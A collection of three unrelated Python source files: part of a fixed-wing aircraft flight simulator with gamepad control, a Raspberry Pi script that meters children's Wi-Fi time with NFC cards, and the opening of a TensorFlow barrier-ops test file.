self.kthr = 100 # N/eff
# Flight surfaces
raileron = Surface(pc=np.array([0, -1, 0]),
q0=np.array([0, 0, 0, 1]),
Cp1=np.array([0, 0, 0.01]),
Cp2=np.array([0, 0, 0.01]),
Cq=np.array([0, 0, 0]),
upoint=np.array([-0.1, -0.05, 0]),
uaxis=np.array([0, 1, 0]),
umin=-np.pi/6,
umax=np.pi/6,
udot=np.pi/1)
laileron = Surface(pc=np.array([0, 1, 0]),
q0=np.array([0, 0, 0, 1]),
Cp1=np.array([0, 0, 0.005]),
Cp2=np.array([0, 0, 0.005]),
Cq=np.array([0, 0, 0]),
upoint=np.array([-0.1, 0.05, 0]),
uaxis=np.array([0, 1, 0]),
umin=-np.pi/6,
umax=np.pi/6,
udot=np.pi/1)
elevator = Surface(pc=np.array([-1.3, 0, 0]),
q0=np.array([0, 0, 0, 1]),
Cp1=np.array([0, 0, 0.05]),
Cp2=np.array([0, 0, 0.05]),
Cq=np.array([0, 0, 0]),
upoint=np.array([-1.3, 0, 0.8]),
uaxis=np.array([0, -1, 0]),
umin=-np.pi/6,
umax=np.pi/6,
udot=np.pi/1)
rudder = Surface(pc=np.array([-1.5, 0, 0]),
q0=np.array([0, 0, 0, 1]),
Cp1=np.array([0, 0.05, 0]),
Cp2=np.array([0, 0.05, 0]),
Cq=np.array([0, 0, 0]),
upoint=np.array([-1, 0, 0]),
uaxis=np.array([0, 0, 1]),
umin=-np.pi/6,
umax=np.pi/6,
udot=np.pi/1)
self.surfaces = [raileron, laileron, elevator, rudder]
# Initial rigid body state, modified by self.update function
self.p = np.array([0, -20, 0], dtype=np.float64) # m
self.q = quaternion_from_euler(np.deg2rad(0), np.deg2rad(0), np.deg2rad(0)) # quaternion
self.v = np.array([0, 0, 0], dtype=np.float64) # m/s
self.w = np.array([0, 0, 0], dtype=np.float64) # rad/s
def update(self, thr, ail, elv, rud, t, dt):
"""
Updates internal rigid body state given throttle, surface commands,
the current time, and the timestep to forward simulate.
"""
wind_body = rotate_vector(self.q, wind(t), reverse=True)
vair = self.v + np.cross(self.w, self.rc) - wind_body
F_thr = np.array([self.kthr*thr, 0, 0])
F_drag = -dens*(self.Cp1 + self.Cp2*np.abs(vair))*vair
F_grav = self.m * rotate_vector(self.q, grav, reverse=True)
T_drag = np.cross(self.rc, F_drag) - self.Cq*self.w
ucmd = [ail*self.surfaces[0].umax, -ail*self.surfaces[1].umax, elv*self.surfaces[2].umax, rud*self.surfaces[3].umax]
F_surf_net = np.zeros(3)
T_surf_net = np.zeros(3)
for i, surf in enumerate(self.surfaces):
surf.ucmd = ucmd[i]
surf.update(dt)
vsurf = rotate_vector(surf.q, self.v + np.cross(self.w, surf.pc_body) - wind_body, reverse=True) # ignores rotation of surface itself
F_surf = rotate_vector(surf.q, -dens*(surf.Cp1 + surf.Cp2*np.abs(vsurf))*vsurf)
T_surf = np.cross(surf.pc_body, F_surf) - rotate_vector(surf.q, surf.Cq*rotate_vector(surf.q, self.w, reverse=True))
F_surf_net = F_surf_net + F_surf
T_surf_net = T_surf_net + T_surf
ap = self.invm*(F_thr + F_surf_net + F_drag + F_grav) - np.cross(self.w, self.v)
aq = self.invM.dot(T_surf_net + T_drag - np.cross(self.w, self.M.dot(self.w)))
self.p = self.p + rotate_vector(self.q, dt*self.v + 0.5*(dt**2)*ap)
self.q = quaternion_multiply(self.q, quaternion_from_rotvec(dt*self.w + 0.5*(dt**2)*aq))
self.v = self.v + dt*ap
self.w = self.w + dt*aq
# Basic ground
if self.p[2] < -0.01:
self.p[2] = 0
v_world = rotate_vector(self.q, self.v)
if v_world[2] < 0:
v_world[2] = 0
self.v = rotate_vector(self.q, v_world, reverse=True)
###################################################################### SCENE SETUP
class Viz(object):
def __init__(self, surfaces):
self.building_layout = np.ones((5, 5))
self.building_size = (30, 30, 40) # m
self.building_spacing = np.float64(100) # m
self.fig = mlab.figure(size=(500, 500), bgcolor=(0.1, 0.1, 0.1))
# Set figure for visual objects
visual.set_viewer(self.fig)
# Convenient local aliases
nx, ny = self.building_layout.shape
n = nx * ny
# Beautiful colors
self.building_colors = map(tuple, np.array((np.linspace(0.0, 0.0, n),
np.linspace(0.8, 0.3, n),
np.linspace(0.3, 0.8, n))).T)
# For storing buildings and their locations
self.buildings = []
self.building_centers = np.zeros((n, 2))
# Generate buildings
for i, x in enumerate(np.linspace(0, (nx-1)*(self.building_size[0] + self.building_spacing), nx)):
for j, y in enumerate(np.linspace(0, (ny-1)*(self.building_size[1] + self.building_spacing), ny)):
if not self.building_layout[i, j]: continue
idx = int(ny*i + j)
self.building_centers[idx] = (x, y)
self.buildings.append(visual.box(x=x, y=y, z=self.building_size[2]/2, size=self.building_size, color=self.building_colors[idx]))
# Generate ground plane
ground_xx, ground_yy = map(np.transpose, np.meshgrid(np.linspace(np.min(self.building_centers[:, 0]-50), np.max(self.building_centers[:, 0]+2500), 40),
np.linspace(np.min(self.building_centers[:, 1]-50), np.max(self.building_centers[:, 1]+2500), 40)))
self.ground = mlab.surf(ground_xx, ground_yy, np.random.sample(np.shape(ground_xx))-0.8, colormap="ocean", warp_scale=1)
# Generate aircraft
self.headspan = 0.4+2
self.tailspan = 0.6+2
self.wingspan = 0.8*(self.headspan + self.tailspan)
self.sweep = -0.2*0
self.rudheight = 0.2*self.wingspan
self.aircraft_nodes = np.vstack(([(self.headspan, 0, 0), (-self.tailspan, 0, 0)])).T
# [(0, 0, 0), (self.sweep, self.wingspan/2, 0)],
# [(0, 0, 0), (self.sweep, -self.wingspan/2, 0)],
# [(-self.tailspan, 0, 0), (-self.tailspan+self.sweep/5, 0, self.rudheight)],
# [(-self.tailspan+self.sweep/5, 0, self.rudheight), (-self.tailspan+self.sweep/5, self.wingspan/4, self.rudheight)],
# [(-self.tailspan+self.sweep/5, 0, self.rudheight), (-self.tailspan+self.sweep/5, -self.wingspan/4, self.rudheight)])).T
self.aircraft_fusel = np.vstack(([(self.headspan, 0, 0), (0, 0, 0)],
[(-self.tailspan, 0, 0), (-self.tailspan+self.sweep/5, 0, self.rudheight)])).T
self.aircraft_wings = np.vstack(([(self.sweep, self.wingspan/2, 0), (self.sweep, -self.wingspan/2, 0)])).T
self.aircraft_tail = np.vstack(([(-self.tailspan+self.sweep/4, 0.25*self.wingspan, self.rudheight), (-self.tailspan+self.sweep/4, -0.25*self.wingspan, self.rudheight)])).T
self.aircraft_nodes_plot = mlab.points3d(self.aircraft_nodes[0, :], self.aircraft_nodes[1, :], self.aircraft_nodes[2, :], scale_factor=0.2, color=(0.5, 0.5, 0.5))
self.aircraft_fusel_plot = mlab.plot3d(self.aircraft_fusel[0, :], self.aircraft_fusel[1, :], self.aircraft_fusel[2, :], tube_sides=10, tube_radius=0.08, color=(1, 0, 0))
self.aircraft_wings_plot = mlab.plot3d(self.aircraft_wings[0, :], self.aircraft_wings[1, :], self.aircraft_wings[2, :], tube_sides=10, tube_radius=0.08, color=(1, 0, 1))
self.aircraft_tail_plot = mlab.plot3d(self.aircraft_tail[0, :], self.aircraft_tail[1, :], self.aircraft_tail[2, :], tube_sides=10, tube_radius=0.05, color=(1, 1, 0))
self.aircraft_surface_plots = []
self.aircraft_surface_corners = np.array([[ 0.2, 1, 0],
[-0.2, 1, 0],
[-0.2, -1, 0],
[ 0.2, -1, 0]])
self.rudder_corners = np.array([[ 0.2, 0, 0.7,],
[-0.2, 0, 0.7,],
[-0.2, 0, 0.05,],
[ 0.2, 0, 0.05,]])
# for surf in surfaces:
# surf_corners_body = []
# for corner in self.aircraft_surface_corners:
# surf_corners_body.append(surf.upoint + rotate_vector(surf.q, surf.pc+corner))
# surf_corners_body = np.array(surf_corners_body)
# xx, yy = np.meshgrid(surf_corners_body[:2, 0], surf_corners_body[1:3, 1])
# self.aircraft_surface_plots.append(mlab.mesh(xx, yy, surf_corners_body[:, 2].reshape(2, 2), colormap="autumn"))
# Aliases for Mayavi animate decorator and show function
self.animate = mlab.animate
self.show = mlab.show
def update(self, p, q, surfaces, view_kwargs={}):
"""
Redraws the aircraft in fig according to the given position, quaternion, surfaces, and view.
"""
# Transform body geometry to world coordinates (using rotation matrix is faster for multiple points)
p = p.reshape(3, 1)
R = rotmat_from_quaternion(q)
aircraft_nodes_world = p + R.dot(self.aircraft_nodes)
aircraft_fusel_world = p + R.dot(self.aircraft_fusel)
aircraft_wings_world = p + R.dot(self.aircraft_wings)
aircraft_tail_world = p + R.dot(self.aircraft_tail)
# Update plot objects with new world coordinate information
self.aircraft_nodes_plot.mlab_source.set(x=aircraft_nodes_world[0, :], y=aircraft_nodes_world[1, :], z=aircraft_nodes_world[2, :])
self.aircraft_fusel_plot.mlab_source.set(x=aircraft_fusel_world[0, :], y=aircraft_fusel_world[1, :], z=aircraft_fusel_world[2, :])
self.aircraft_wings_plot.mlab_source.set(x=aircraft_wings_world[0, :], y=aircraft_wings_world[1, :], z=aircraft_wings_world[2, :])
self.aircraft_tail_plot.mlab_source.set(x=aircraft_tail_world[0, :], y=aircraft_tail_world[1, :], z=aircraft_tail_world[2, :])
for i, surf in enumerate(surfaces):
if i < 3:
surf_corners_body = []
for corner in self.aircraft_surface_corners:
surf_corners_body.append(surf.upoint + rotate_vector(surf.q, surf.pc+corner))
surf_corners_body = np.array(surf_corners_body)
surf_corners_world = (p + R.dot(surf_corners_body.T)).T
# xx, yy = np.meshgrid(surf_corners_world[:2, 0], surf_corners_world[1:3, 1])
# zz = np.vstack((surf_corners_world[:2, 2], surf_corners_world[:2, 2]))
# self.aircraft_surface_plots[i].mlab_source.set(x=xx, y=yy, z=zz)
if not hasattr(self, "ra_checker"):
self.ra_checker = mlab.plot3d(surf_corners_world[:, 0], surf_corners_world[:, 1], surf_corners_world[:, 2])
elif i==0:
self.ra_checker.mlab_source.set(x=surf_corners_world[:, 0], y=surf_corners_world[:, 1], z=surf_corners_world[:, 2])
if not hasattr(self, "la_checker"):
self.la_checker = mlab.plot3d(surf_corners_world[:, 0], surf_corners_world[:, 1], surf_corners_world[:, 2])
elif i==1:
self.la_checker.mlab_source.set(x=surf_corners_world[:, 0], y=surf_corners_world[:, 1], z=surf_corners_world[:, 2])
if not hasattr(self, "el_checker"):
self.el_checker = mlab.plot3d(surf_corners_world[:, 0], surf_corners_world[:, 1], surf_corners_world[:, 2])
elif i==2:
self.el_checker.mlab_source.set(x=surf_corners_world[:, 0], y=surf_corners_world[:, 1], z=surf_corners_world[:, 2])
if not hasattr(self, "ru_checker"):
self.ru_checker = mlab.plot3d(surf_corners_world[:, 0], surf_corners_world[:, 1], surf_corners_world[:, 2])
elif i==3:
surf_corners_body = []
for corner in self.rudder_corners:
surf_corners_body.append(surf.upoint + rotate_vector(surf.q, surf.pc+corner))
surf_corners_body = np.array(surf_corners_body)
surf_corners_world = (p + R.dot(surf_corners_body.T)).T
self.ru_checker.mlab_source.set(x=surf_corners_world[:, 0], y=surf_corners_world[:, 1], z=surf_corners_world[:, 2])
# Set camera view
if view_kwargs: mlab.view(**view_kwargs)
###################################################################### INTERFACE SETUP
class Command(object):
"""
Freedoms that would be commanded by a human pilot.
"""
def __init__(self, thr=0.0, roll=0.0, pitch=0.0, yaw=0.0):
self.thr = np.float64(thr)
self.roll = np.float64(roll)
self.pitch = np.float64(pitch)
self.yaw = np.float64(yaw)
class Pilot(object):
"""
User interface for remote-controlling.
Call start_pilot_thread to begin filling an internal buffer with user input.
Call get_command to execute / clear the buffer and get the current relevant Command object.
Call stop_pilot_thread when done!
max_thr: magnitude of the largest acceptable throttle command
max_roll: magnitude of the largest acceptable roll command
max_pitch: magnitude of the largest acceptable pitch command
max_yaw: magnitude of the largest acceptable yaw command
stick_deadband: fraction of analog joystick travel that should be treated as zero
trigger_deadband: fraction of analog trigger travel that should be treated as zero
max_buffer_size: maximum number of user commands that should be stored before dropping old ones
button_callbacks: dictionary of callback functions keyed by button names (A, B, X, Y, L, R, SL, SR, DV, DH, K)
"""
def __init__(self, max_thr=1, max_roll=1, max_pitch=1, max_yaw=1,
stick_deadband=0.1, trigger_deadband=0.0, max_buffer_size=200, button_callbacks={}):
self.max_thr = np.float64(max_thr)
self.max_roll = np.float64(max_roll)
self.max_pitch = np.float64(max_pitch)
self.max_yaw = np.float64(max_yaw)
self.stick_deadband = float(stick_deadband)
self.trigger_deadband = float(trigger_deadband)
self.max_buffer_size = int(max_buffer_size)
self.button_callbacks = button_callbacks
# Valid input device names in priority order
self.valid_device_names = ["Microsoft X-Box One pad (Firmware 2015)",
"PowerA Xbox One wired controller",
"Logitech Gamepad F310"]
# Set valid input device
self.input_device = None
for valid_device_name in self.valid_device_names:
if self.input_device is not None: break
for device in devices:
if device.name == valid_device_name:
self.input_device = device.name
print "Hello, Pilot! Ready to read from {}.".format(device.name)
break
if self.input_device is None: raise IOError("FATAL: No valid input device is connected!")
# Digital button code names
self.button_codes = {"BTN_SOUTH": "A", "BTN_EAST": "B", "BTN_NORTH": "X", "BTN_WEST": "Y",
"BTN_TL": "L", "BTN_TR": "R", "BTN_SELECT": "SL", "BTN_START": "SR",
"ABS_HAT0Y": "DV", "ABS_HAT0X": "DH", "BTN_MODE": "K"}
# Analog input characteristics
self.max_stick = 32767
if self.input_device == "Logitech Gamepad F310": self.max_trigger = 255
else: self.max_trigger = 1023
self.min_stick = int(self.stick_deadband * self.max_stick)
self.min_trigger = int(self.trigger_deadband * self.max_trigger)
# Internals
self.command = None
self.pilot_thread = None
self.stay_alive = False
self.buffer = deque([])
self.buffer_size_flag = False
def get_command(self):
"""
Executes / clears the input buffer and returns the current relevant Command object.
"""
if self.pilot_thread is None: raise AssertionError("FATAL: Cannot get_command without active pilot thread!")
while self.buffer:
event = self.buffer.pop()
if event.code == "ABS_Y": pass
elif event.code == "ABS_X": self.command.roll = self._stick_frac(event.state) * self.max_roll
elif event.code == "ABS_RY": self.command.pitch = -self._stick_frac(event.state) * self.max_pitch
elif event.code == "ABS_RX": self.command.yaw = self._stick_frac(event.state) * self.max_yaw
elif event.code == "ABS_Z": pass
elif event.code == "ABS_RZ": self.command.thr = self._trigger_frac(event.state) * self.max_thr
elif event.code in self.button_codes:
# if event.code == "BTN_WEST": self.command.start = int(event.state * self.mission_code)
# elif event.code == "BTN_NORTH": self.command.cancel = bool(event.state)
# elif event.code == "BTN_MODE": self.command.kill = bool(event.state)
self.button_callbacks.get(self.button_codes[event.code], lambda val: None)(event.state)
return self.command
def start_pilot_thread(self):
"""
Starts a thread that reads user input into the internal buffer.
"""
if self.stay_alive:
print "----------"
print "WARNING: Pilot thread already running!"
print "Cannot start another."
print "----------"
return
self.command = Command()
self.stay_alive = True
if self.input_device in ["Microsoft X-Box One pad (Firmware 2015)",
"PowerA Xbox One wired controller",
"Logitech Gamepad F310"]:
self.pilot_thread = Thread(target=self._listen_xbox)
else:
raise IOError("FATAL: No listener function has been implemented for device {}.".format(self.input_device))
print "Pilot thread has begun!"
self.pilot_thread.start()
def stop_pilot_thread(self):
"""
Terminates the Pilot's user input reading thread and clears the buffer.
"""
self.stay_alive = False
if self.pilot_thread is not None:
print "Pilot thread terminating on next input!"
self.pilot_thread.join() # stay secure
self.pilot_thread = None
while self.buffer:
self.buffer.pop()
self.buffer_size_flag = False
self.command = None
def _listen_xbox(self):
try:
while self.stay_alive:
self.buffer.appendleft(get_gamepad()[0]) # this is blocking (hence need for threading)
if len(self.buffer) > self.max_buffer_size:
if not self.buffer_size_flag:
self.buffer_size_flag = True
print "----------"
print "WARNING: Pilot input buffer reached {} entries.".format(self.max_buffer_size)
print "Dropping old commands."
print "----------"
self.buffer.pop()
finally:
print "Pilot thread terminated!"
self.pilot_thread = None
def _stick_frac(self, val):
if abs(val) > self.min_stick:
return np.divide(val, self.max_stick, dtype=np.float64)
return np.float64(0)
def _trigger_frac(self, val):
if abs(val) > self.min_trigger:
return np.divide(val, self.max_trigger, dtype=np.float64)
return np.float64(0)
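# Worked example of the deadband math above (hypothetical readings): with
# stick_deadband=0.1 the cutoff is int(0.1*32767) = 3276, so a raw stick value
# of 2000 maps to 0.0 while 16384 maps to roughly 0.5 of the maximum.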
# User button-press callbacks
####
# Toggle camera following
def bcb_A(val):
global cam_follow
if val:
if cam_follow: cam_follow = False
else: cam_follow = True
# Reset
def bcb_B(val):
global state0, fixwing, des_roll, des_pitch, des_yaw, des_w0, des_w1, des_w2, rc, integ_roll, integ_pitch
if val:
fixwing.p = state0[0]
fixwing.q = state0[1]
fixwing.v = state0[2]
fixwing.w = state0[3]
des_roll = 0
des_pitch = 0
des_yaw = 0
des_w0 = 0
des_w1 = 0
des_w2 = 0
rc = np.array([0, 0, 0])
integ_roll = 0
integ_pitch = 0
# Zoom-out camera
def bcb_L(val):
global cam_dist_rate
cam_dist_rate = val*20 # m/s
# Zoom-in camera
def bcb_R(val):
global cam_dist_rate
cam_dist_rate = -val*20 # m/s
# # Decrement mission code
# def bcb_SL(val):
# pilot.mission_code -= int(val)
# if pilot.mission_code < 0: pilot.mission_code = 0
# if val: print "Prepared for mission {}.".format(pilot.mission_code)
# # Increment mission code
# def bcb_SR(val):
# pilot.mission_code += int(val)
# if val: print "Prepared for mission {}.".format(pilot.mission_code)
# Change camera elevation
def bcb_DV(val):
global cam_elev_rate
cam_elev_rate = val*45 # deg/s
# Change camera azimuth
def bcb_DH(val):
global cam_azim_rate
cam_azim_rate = val*45 # deg/s
####
###################################################################### SIMULATION
# Time and timestep
t = time.time() # s
dt = 0.01 # s
# Aircraft, scene, and user
fixwing = FixWing()
state0 = [fixwing.p, fixwing.q, fixwing.v, fixwing.w]
viz = Viz(fixwing.surfaces)
pilot = Pilot(button_callbacks={"A": bcb_A, "B": bcb_B, "L": bcb_L, "R": bcb_R, "DV": bcb_DV, "DH": bcb_DH})
# "SL": bcb_SL, "SR": bcb_SR, "DV": bcb_DV, "DH": bcb_DH})
# Initial camera condition
cam_state = {"focalpoint": fixwing.p.tolist(), "azimuth": 180, "elevation": 85, "distance": 25} # m and deg
cam_azim_rate = 0
cam_elev_rate = 0
cam_dist_rate = 0
cam_follow = True
# Adaptive estimate of CoP, integrators, smoothers etc...
rc = np.array([0, 0, 0])
integ_roll = 0
integ_pitch = 0
des_roll = 0
des_pitch = 0
des_yaw = 0
des_w0 = 0
des_w1 = 0
des_w2 = 0
use_controller = 0
use_tgen = True
use_course = False
# Simulation loop function
@viz.animate(delay=50) # ms (20 FPS is the best Mayavi can do)
def simulate():
global cam_state, t, rc, integ_roll, integ_pitch, des_roll, des_pitch, des_yaw, des_w0, des_w1, des_w2
while True:
# Between each scene render, simulate up to real-time
while t < time.time():
# Update user input commands and compute efforts needed to achieve those commands
cmd = pilot.get_command()
lim = np.deg2rad(60)
roll, pitch, yaw = euler_from_quaternion(fixwing.q)
if use_tgen: # whether or not to smooth inputs
spring = 0.8
damp = 2*np.sqrt(spring)
des_a0 = spring*(cmd.roll*lim - des_roll) - damp*des_w0
des_w0 += dt*des_a0
des_roll += dt*des_w0 + 0.5*dt**2*des_a0
des_a1 = spring*(cmd.pitch*lim - des_pitch) - damp*des_w1
des_w1 += dt*des_a1
des_pitch += dt*des_w1 + 0.5*dt**2*des_a1
if use_course:
des_a2 = 5*(-np.deg2rad(10)*cmd.yaw - des_w2)
des_w2 += dt*des_a2
des_yaw += dt*des_w2 + 0.5*dt**2*des_a2
des_yaw = unwrap_angle(des_yaw)
else:
des_yaw = yaw
des_w2 = -cmd.yaw*np.deg2rad(10)
else:
des_roll = cmd.roll*lim
des_pitch = cmd.pitch*lim
des_yaw = yaw
des_w0 = des_w1 = 0
des_w2 = -cmd.yaw*np.deg2rad(10)
e = rotvec_from_quaternion(quaternion_multiply(quaternion_inverse(fixwing.q), quaternion_from_euler(des_roll, des_pitch, des_yaw)))
kp = [20, 10, 10]
kd = [10, 10, 10]
if not use_course: kp[2] = 0
if use_controller == 1: # simple PD
uroll = kp[0]*(des_roll - roll) + kd[0]*(des_w0 - fixwing.w[0])
upitch = kp[1]*(des_pitch - pitch) + kd[1]*(des_w1 - fixwing.w[1])
uyaw = kd[2]*(des_w2 - fixwing.w[2])
fixwing.update(cmd.thr, uroll, upitch, -uyaw, t, dt)
print " e: ", np.rad2deg(np.round(e, 3))
elif use_controller == 2: # PID
uroll = kp[0]*(des_roll - roll) + kd[0]*(des_w0 - fixwing.w[0]) + integ_roll
upitch = kp[1]*(des_pitch - pitch) + kd[1]*(des_w1 - fixwing.w[1]) + integ_pitch
uyaw = kd[2]*(des_w2 - fixwing.w[2])
integ_roll += dt*1*(des_roll - roll)
integ_pitch += dt*3*(des_pitch - pitch)
fixwing.update(cmd.thr, uroll, upitch, -uyaw, t, dt)
print "integs roll, pitch: ", np.round((integ_roll, integ_pitch), 2), "| e: ", np.round(np.rad2deg(e), 1)
elif use_controller == 3: # adaptive
Cp = fixwing.Cp1
s = fixwing.v
E = np.array([1, 1, 1])
ff = (-dens*np.cross(rc, Cp*s) - np.cross(fixwing.w, fixwing.M.dot(fixwing.w)))# / (dens*E*npl.norm(s)**2)
uroll = kp[0]*e[0] + kd[0]*(des_w0 - fixwing.w[0]) - ff[0]
upitch = kp[1]*e[1] + kd[1]*(des_w1 - fixwing.w[1]) - ff[1]
uyaw = kp[2]*e[2] + kd[2]*(des_w2 - fixwing.w[2]) - ff[2]
Y = dens*np.array([[ 0, -Cp[2]*s[2], Cp[1]*s[1]],
[ Cp[2]*s[2], 0, -Cp[0]*s[0]],
[-Cp[1]*s[1], Cp[0]*s[0], 0]])
rc = rc - dt*0.03*([1, 1, 1]*Y.T.dot(kp*e + kd*([des_w0, des_w1, des_w2] - fixwing.w)))
# rc = [-0.019, 0, 0]
# print "ff: ", np.round(ff, 3)
print "rc: ", np.round(rc, 3), "| e: ", np.round(np.rad2deg(e), 1)
fixwing.update(cmd.thr, uroll, upitch, -uyaw, t, dt)
else: # direct inputs
fixwing.update(cmd.thr, cmd.roll, cmd.pitch, cmd.yaw, t, dt)
# print np.round(np.rad2deg(roll), 3), np.round(np.rad2deg(pitch), 3), np.round(np.rad2deg(yaw), 3)
# fixwing.w = np.array([des_w0, des_w1, des_w2]) # IDEAL OVERRIDE
# fixwing.q = quaternion_from_euler(des_roll, des_pitch, 0)
t += dt
# Update camera state according to user input
if cam_follow: cam_state["focalpoint"] = fixwing.p.tolist()
cam_state["azimuth"] += dt*cam_azim_rate
cam_state["elevation"] += dt*cam_elev_rate
cam_state["distance"] = np.clip(cam_state["distance"] + dt*cam_dist_rate, 5, np.inf)
# Re-render changed parts of the scene at this real-time instant
viz.update(fixwing.p, fixwing.q, fixwing.surfaces, cam_state)
yield
# print fixwing.surfaces[0].u, fixwing.surfaces[1].u
# Start'er up
pilot.start_pilot_thread()
simulate()
viz.show() # blocking
# Be nice
pilot.stop_pilot_thread()
|
meteredwifi4kids.py
|
# https://github.com/mgthk/meteredwifi4kids
#
# This program is provided as is, without any warranty.
# Thank you for using this program. I hope it works well for you.
# Feel free to improve it.
#
import os
import threading
import datetime
import time
import I2C_LCD_driver
from py532lib.i2c import *
from py532lib.frame import *
from py532lib.constants import *
from collections import deque #use as a fifo queue
def nfc_reader():
pn532 = Pn532_i2c()
pn532.SAMconfigure()
while True:
if not running:
print("Not running")
return
card_data = pn532.read_mifare().get_data()
if card_data is None:
print("Card data is none")
continue
card_data_hex_string = "".join("%02x" % b for b in card_data)
cardid = card_data_hex_string[-8:]
print("Card id : " + cardid)
with queue_lock:
# replaced print with deque.append
queue.append(cardid)
#time.sleep(1)
def wifi_usage_timer():
global wifi_usage_remain_minute
wifi_usage_remain_count_file = "/home/pi/py532lib/" + datetime.datetime.now().strftime("%Y%m%d")
print("Usage remaining counter file : " + wifi_usage_remain_count_file)
while True:
if not os.path.isfile(wifi_usage_remain_count_file):
print(wifi_usage_remain_count_file + " does not exist. Creating one and setting the default.")
count_file = open(wifi_usage_remain_count_file,"w+")
count_file.write(str(authorized_wifi_usage_remain_minute))
count_file.close()
count_file = open(wifi_usage_remain_count_file,"r")
wifi_usage_remain_minute = int(count_file.read())
count_file.close()
if isWiFiEnabled:
print("Sleep 60 seconds...")
time.sleep(60)
wifi_usage_remain_minute = wifi_usage_remain_minute - 1
count_file = open(wifi_usage_remain_count_file,"w")
count_file.write(str(wifi_usage_remain_minute))
count_file.close()
print("WiFi usage remaining in minute =", wifi_usage_remain_minute)
#else:
#print("WiFi not enabled. Counter not update. WiFi usage remaining in minute =", wifi_usage_remain_minute)
def enableWifi():
print("Enabling WiFi")
#run systemctl start hostapd
os.system("/usr/bin/sudo /bin/systemctl start hostapd")
return True
def disableWifi():
print("Disabling WiFi")
#run systemctl stop hostapd
os.system("/usr/bin/sudo /bin/systemctl stop hostapd")
return False
def updateLCD():
print("updateLCD")
# isWiFiEnabled and wifi_usage_remain_minute are read from the module-level globals
wifi_status = "Off"
if isWiFiEnabled:
wifi_status = "On"
else:
wifi_status = "Off"
lcdMsg1 = "Wifi " + wifi_status + ". " + str(wifi_usage_remain_minute) + " min "
mylcd.lcd_display_string(lcdMsg1, 1)
now = datetime.datetime.now()
lcdMsg2 = now.strftime("%Y-%m-%d %H:%M")
mylcd.lcd_display_string(lcdMsg2, 2)
#time.sleep(1)
def isAuthorizedCard(provided_cardid):
print("Detected card id:", provided_cardid)
print("Authorized card id:", authorized_cardid)
if authorized_cardid == provided_cardid:
print("card authorized")
return True
else:
print("card not authorized")
return False
#Main
#Init params
no_card_timer=0
isWiFiEnabled=False
wifi_usage_remain_minute=0
queue = deque() #queue to pass information from thread to main process
queue_lock = threading.Lock() # prevent concurrent access issues between the NFC reader thread and the main loop
running = True
print("Init LCD... ")
mylcd = I2C_LCD_driver.lcd()
mylcd.lcd_clear()
#wifi_usage_remain_count_file = "/home/pi/py532lib/" + datetime.datetime.now().strftime("%Y%m%d")
#print("Usage remaining counter file : " + wifi_usage_remain_count_file)
authorized_cardid_file = "/home/pi/py532lib/authorizedcardid"
print("authorized cardid file : " + authorized_cardid_file)
cardid_file = open(authorized_cardid_file,"r")
authorized_cardid = cardid_file.read().rstrip()
cardid_file.close()
authorized_wifitime_file = "/home/pi/py532lib/authorizedwifitime"
print("authorized wifi time file : " + authorized_wifitime_file)
wifitime_file = open(authorized_wifitime_file,"r")
authorized_wifi_usage_remain_minute = int(wifitime_file.read().rstrip())
wifitime_file.close()
nfc_thread = threading.Thread(target=nfc_reader)
nfc_thread.start()
wifi_usage_timer_thread = threading.Thread(target=wifi_usage_timer)
wifi_usage_timer_thread.start()
disableWifi()
updateLCD()
while True: #also cheap, but easy
if queue: #bool(deque) works like bool(list)
with queue_lock:
cardid = queue.popleft()
no_card_timer=0
print("isWiFiEnabled", isWiFiEnabled)
if wifi_usage_remain_minute <= 0:
isWiFiEnabled = disableWifi()
if isWiFiEnabled:
print("Wifi already enabled. Do Nothing")
else:
if wifi_usage_remain_minute > 0 :
if isAuthorizedCard(cardid):
print("Card authorized : ", cardid)
isWiFiEnabled = enableWifi()
else:
print("Card not authorized : ", cardid)
disableWifi()
else:
print("No more usage time left.", wifi_usage_remain_minute)
updateLCD()
continue
else:
no_card_timer = no_card_timer+1
#print ("Card not present timer = ", no_card_timer)
if no_card_timer >= 10:
no_card_timer=0
print("isWiFiEnabled", isWiFiEnabled)
#unconditional force shutdown wifi
isWiFiEnabled = disableWifi()
updateLCD()
time.sleep(1)
|
barrier_ops_test.py
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for barrier ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import time
import numpy as np
import tensorflow as tf
from tensorflow.python.ops import data_flow_ops
class BarrierTest(tf.test.TestCase):
def testConstructorWithShapes(self):
with tf.Graph().as_default():
b = data_flow_ops.Barrier(
(tf.float32, tf.float32),
shapes=((1, 2, 3), (8,)),
shared_name="B",
name="B")
self.assertTrue(isinstance(b.barrier_ref, tf.Tensor))
self.assertEquals(tf.string_ref, b.barrier_ref.dtype)
self.assertProtoEquals("""
name:'B' op:'Barrier'
attr {
key: "capacity"
value {
i: -1
}
}
attr { key: 'component_types'
value { list { type: DT_FLOAT type: DT_FLOAT } } }
attr {
key: 'shapes'
value {
list {
shape {
dim { size: 1 } dim { size: 2 } dim { size: 3 }
}
shape {
dim { size: 8 }
}
}
}
}
attr { key: 'container' value { s: "" } }
attr { key: 'shared_name' value: { s: 'B' } }
""", b.barrier_ref.op.node_def)
def testInsertMany(self):
with self.test_session():
b = data_flow_ops.Barrier(
(tf.float32, tf.float32),
shapes=((), ()),
name="B")
size_t = b.ready_size()
self.assertEqual([], size_t.get_shape())
keys = [b"a", b"b", b"c"]
insert_0_op = b.insert_many(0, keys, [10.0, 20.0, 30.0])
insert_1_op = b.insert_many(1, keys, [100.0, 200.0, 300.0])
self.assertEquals(size_t.eval(), [0])
insert_0_op.run()
self.assertEquals(size_t.eval(), [0])
insert_1_op.run()
self.assertEquals(size_t.eval(), [3])
def testInsertManyEmptyTensor(self):
with self.test_session():
error_message = ("Empty tensors are not supported, but received shape "
r"\'\(0,\)\' at index 1")
with self.assertRaisesRegexp(ValueError, error_message):
data_flow_ops.Barrier((tf.float32, tf.float32),
shapes=((1,), (0,)),
name="B")
def testInsertManyEmptyTensorUnknown(self):
with self.test_session():
b = data_flow_ops.Barrier(
(tf.float32, tf.float32),
name="B")
size_t = b.ready_size()
self.assertEqual([], size_t.get_shape())
keys = [b"a", b"b", b"c"]
